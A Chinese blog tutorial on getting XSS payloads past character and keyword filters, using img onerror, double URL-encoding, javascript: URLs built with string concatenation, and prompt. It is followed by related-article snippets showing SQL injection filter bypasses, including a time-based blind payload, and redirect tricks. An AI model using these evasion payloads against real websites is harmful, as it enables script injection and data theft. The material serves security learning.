过滤的绕过

最新推荐文章于 2023-12-12 14:21:36 发布
原创 最新推荐文章于 2023-12-12 14:21:36 发布 · 1.1k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#javascript #前端 #html

一、在符号过滤的情况下使页面弹窗
1、get传参的方式首先检查能否逃逸。
2、传参在img标签中且可以逃逸,img标签中图片出错触发JavaScript中的onerror事件可以利用。
3、在url中传输 ?xss=111" οnerrοr="alert(1) F12查看Elements中的img标签发现括号被过滤,需要用到url编码来绕过字符的过滤。
在这里插入图片描述

4、url传输?xss=111" οnerrοr=“alert%281%29 编码之后使用F12查看发现括号依然被过滤,以为url在传输之前会先编码一次导致语句还是以括号的形式进入的程序,导致括号再次被过滤。
在这里插入图片描述5、url传输?xss=111” οnerrοr=“alert%25281%2529 使用F12发现括号以编码的形式被传输在img标签,但是弹窗依然没有实现。因为js不可以编码括号,所以使用location来完善一下。
在这里插入图片描述
6、url传输 ?xss=111” οnerrοr=location=“javascript:alert%25281%2529 可以看出弹窗已经实现,location函数可以使右边内容转化为字符。
在这里插入图片描述
二、在符号、关键字过滤的情况使页面弹窗
1、url传输?xss=111”%20οnerrοr=location=“javasc”%2b"ript:al"%2b"ert%25281%2529 可以看出弹窗实现,这里使用了字符串拼接的方法进行了关键字的绕过。其中%2b是字符+的url编码,js中的字符拼接也是使用+字符来实现的。
在这里插入图片描述
2、url传输?xss=111"%20οnerrοr=location=“javasc”%2b"ript:prompt%25281%2529 可以发现弹窗也可以实现,这里使用了其他的弹窗方法绕过,所以也可以使用其他未过滤且功能相同的方法来绕过。
在这里插入图片描述

SQL注入技术详解与过滤绕过方法
Cyc1e的博客
11-07 2075
SQL注入攻击是严重的安全威胁,可能导致数据库数据泄露或篡改。使用参数化查询或ORM框架,避免直接拼接SQL语句。对用户输入进行严格过滤和验证,限制输入的格式和范围。定期更新依赖库,修复已知的安全漏洞。然而,攻击者可能通过编码、注释、拆分关键字等方式绕过简单的防护机制。因此,开发者应使用多层次的防御方法,并定期对应用进行安全测试。
WEB攻防-RCE代码&命令执行&过滤绕过&异或无字符&无回显方案&黑白盒挖掘
weixin_45534587的博客
02-09 982
RCE,全称 Remote Code Execution,也就是远程代码执行。简单来说,它是一种非常危险的安全漏洞。正常情况下,我们访问一个网站或者使用某个应用程序,只能按照开发者设定好的功能来操作。但要是存在 RCE 漏洞,攻击者就能打破这种限制,在目标服务器上执行他们自己编写的代码。
BluecoatURLFilteringBypass:Bluecoat 代理 URL 过滤绕过 PoC
06-05
Bluecoat 代理 URL 过滤绕过,适用于 NodeJS 作者:Arno0x0x - BluecoatFilteringBypassProxy是一个非常基本的 PoC(让我重申一下:非常基本),它是一种简单技术,可用于(80% 的时间)在 Bluecoat 代理上击败 URL 过滤。 虽然此 PoC 已成功针对启用了 WebFilter/WebPulse 的“Bluecoat ProxySG”设备进行测试,但它也可能适用于其他 URL 过滤代理。 值得注意的是,这种技术不涉及使用公司网络之外的任何第三方服务器来执行某种隧道或任何类似的奇特东西。 它对客户端计算机来说都是本地的,不需要任何管理员权限。 诀窍在于即时重写客户端请求。 BluecoatFilteringBypassProxy是用 Javascript 编写的,基于 NodeJS 库和运行时。 它不需要任何额外的
挖洞技巧:如何绕过URL限制
zhangge3663的博客
03-12 9529
大家对URL任意跳转都肯定了解,也知道他的危害,这里我就不细说了,过~ 大家遇到的肯定都是很多基于这样的跳转格式:http://www.xxx.xxx/xxx?xxx=http://www.xxx.xxx/xxxxx 基本的思路大家就是直接替换后面的URL来检测是否存在任意URL跳转,如果不存在,就直接返回到它自己的域名,如果存在,就跳转到你指定的URL。 这里我讲述我所知道的所以小点。 ...
绕过路由封杀问题
weixin_34310785的博客
02-04 204
前一段时间,公司开始对网络进行监控了。 在路由,做了诸了限制,网页上,过滤了很多url和关键字,端口也封杀了不少,连webQQ也不放过。   昨天,就昨天,公司竟然直接封掉了所有的url访问。但通过IP可以直接访问。   猜测了一下,公司的过滤是在以下几个方面进行: 1。url域名过滤 2。关键字过滤 3。端口过滤[先不说]   关于突破方法,先忽略用代理的方法。   关于...
过滤绕过
L6y1a
02-04 453
过滤+绕过整理 1.如果空格被过滤,括号没有被过滤,可以用括号绕过–>括号的两端,可以没有多余的空格 ?id=1%27and(sleep(ascii(mid(database()from(1)for(1)))=109))%23 ?id=1’and(sleep(ascii(mid(database()from(1)for(1)))=109))# 没有逗号也没有空格。猜解database()第一个字符ascii码是否为109,若是则加载延时 2.如果引号被注释,就可以通过十六进制绕过 =“users”
xss绕过方法有哪些?XSS攻击绕过过滤方法技巧分享(xss绕过宝塔)
白帽子佳奇的博客
12-12 7224
XSS(跨站脚本攻击)绕过方法是一系列技巧,用来绕过目标网站的安全措施和过滤器,执行恶意的脚本。
bs-inject-sql_一款功能强大的SQL盲注渗透测试工具_支持时间盲注和布尔盲注两种注入方式_具备绕过多种安全过滤机制的能力_包括空格过滤绕过_单引号过滤绕过_if语句过滤.zip
最新发布
07-23
bs-inject-sql_一款功能强大的SQL盲注渗透测试工具_支持时间盲注和布尔盲注两种注入方式_具备绕过多种安全过滤机制的能力_包括空格过滤绕过_单引号过滤绕过_if语句过滤.zip
XSS过滤绕过手法与加载payload
NZXHJ的博客
07-29 2146
关于各类XSS注入过滤绕过手法,以及利用XSS平台加载注入payload讲解
mysql查询过滤%符号_小课堂 -- 绕过去除特殊字符的sql注入
weixin_28932089的博客
02-19 851
环境sqli-labsless 251、输入特殊字符,报错http://192.168.1.121/sqli/Less-25/?id=1\ 2、单引号闭合 3、输入and、or都会被过滤,报错,输入||正常,所以可以判断是大小写过滤http://192.168.1.121/sqli/Less-25/?id=1' and 1=1 --+http://192.168.1.121/sqli/Less-2...
sql注入过滤了#,--+怎么办
weixin_30673715的博客
11-26 2002
题目是NCTF2018的web题目 第一段是错误的思路,第二段是晚上有思考后发现的直接看第二段吧。 ① ?id=1'会直接出来报错提示。 猜测使用单引号保护id。 另外一打空格就提示you hacker,空格在尾部是不会提示的,猜测用了去除尾部的空格的函数trim()。 空格的过滤绕过 %20 %09 %0a %0b %0c %0d %a0 %00 /**/ () 挨个试就行,最好不...
对字符进行修改从而绕过
E1even的博客
12-24 285
基于代码审计和部分sql相关的绕过: or || % ^ 0b ~~ 题目类型如下: 以下分为6个方式来讨论该类型: 第一题:无绕过 对代码进行分析:需要GET一个ID<999的参数,但是flag需要id=1000才能获取。这里我们还可以看到他执行的是SQL语句,因此大概率是SQL注入。 我们随便输入一些ID的值得到以下内容: ID=1 ID=2 为什么ID=2之后都没有结果呢?当然是因为数据库里面查询不到这个值,而学习过SQL注入的同学应该知道,order by 字段与 union selec
XSS漏洞详解以及绕过方式。
m0_63028223的博客
05-14 1619
下列以dvwa靶场为例: 反射性XSS: LOW级别 <script>alert('test')</script> 最基本的原理,就是前端对输入的内容过滤不严谨,是的输入的元素再html框架中得以运行。 medium级别 可能过滤了js标签,我们使用input标签, <input onblur=alert`1`>当input失去焦点时会触发 <input onclick=alert `123'> 当input获取焦点(点击输入)时触发
URL 过滤
han____shuai的专栏
08-29 5843
Adblock Plus 过滤规则  : https://adblockplus.org/zh_CN/filters 撰写 Adblock Plus 过滤规则 AdBlock Plus 过滤规则介绍 基本过滤规则 定义例外规则 匹配网址开头/结尾 标记分隔符 注释 特殊注释 进阶功能 指定过滤规则选项 使用正则表达式 元素隐藏
Browser Security Plus 企业网络过滤工具
ITmoster的博客
10-17 1693
网络上充斥着恶意软件和其他攻击媒介,它们正等待着利用用户的失误和分心。在浏览网页时,用户有时会意外登陆被恶意软件感染的恶意网站,从而导致敏感的企业数据泄露。借助 Browser Security Plus 的网络活动跟踪功能,IT 管理员可以很好地了解哪些网站是不必要的并且需要被阻止。根据这些见解,他们可以使用企业URL 过滤功能来拒绝/允许访问网站和 Web 应用程序。
【挖洞经验】url重定向
Fly_鹏程万里
12-20 2874
 url重定向绕过方式   俗话说的好,上有政策,下有对策,url重定向的绕过姿势也越来越多样化。普通url重定向方法测试不成功,换个姿势,说不定可以再次绕过。   这里总结下成功的绕过方式。 (1)      使用#或者@或者?或者\来绕过   这个是比较常见的绕过方式,利用程序或者浏览器对这些特殊符号的解析,可以让url重定向到我们指定的地址。不过,大部分的开发已经注意到了这点,已经做...
XSS 常用标签及绕过姿势总结
hackzkaq的博客
08-17 6832
A位置可填充 /,/123/,%09,%0A,%0C,%0D,%20 B位置可填充 %09,%0A,%0C,%0D,%20 C位置可填充 %0B,/**/,如果加了双引号,则可以填充 %09,%0A,%0C,%0D,%20 D位置可填充 %09,%0A,%0C,%0D,%20,//,>例如 javascript:alert(1) ,进行 Unicode 编码时,只能对 alert 和 “1” 进行编码,框号编码后会被当成文本字符,不能执行。...
前端常见安全漏洞
whaleluo的博客
05-11 2341
文章目录xss跨站脚本攻击csrf->xsrf跨站请求伪造攻击SSRF服务端请求构造点击劫持sql注入 xss跨站脚本攻击 以"文章发布系统"为例 input输入框输入字符串后使用v-html渲染成HTML显示在当前页面 当input输入script(sc里面的js不会执行) <script>alert(document.cookie)</script> 当input输入img标签的onerror回调(弹出cookie) <img src="test" on
【自用】xsspayload
头发和技术只能选择一个
09-28 1263
(1)普通的XSS JavaScript注入 (2)IMG标签XSS使用JavaScript命令 (3)IMG标签无分号无引号 (4)IMG标签大小写不敏感 (5)HTML编码(必须有分号) (6)修正缺陷IMG标签 <IMG “”">”> (7)formCharCode标签(计算器) (8)UTF-8的Unicode编码(计算器) <IMG SRC=jav…省略…S’)> (9)7位的UTF-8的Unicode编码是没有分号的(计算器) <IMG SRC
文件名过滤绕过
07-18
首先,用户的问题是关于防止或修复文件名过滤绕过漏洞的。用户引用了多个引用,这些引用讨论了文件上传漏洞、黑名单绕过、白名单机制等。 关键点: - 引用[1]:提到黑名单绕过是一种攻击方法,攻击者修改文件类型或...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值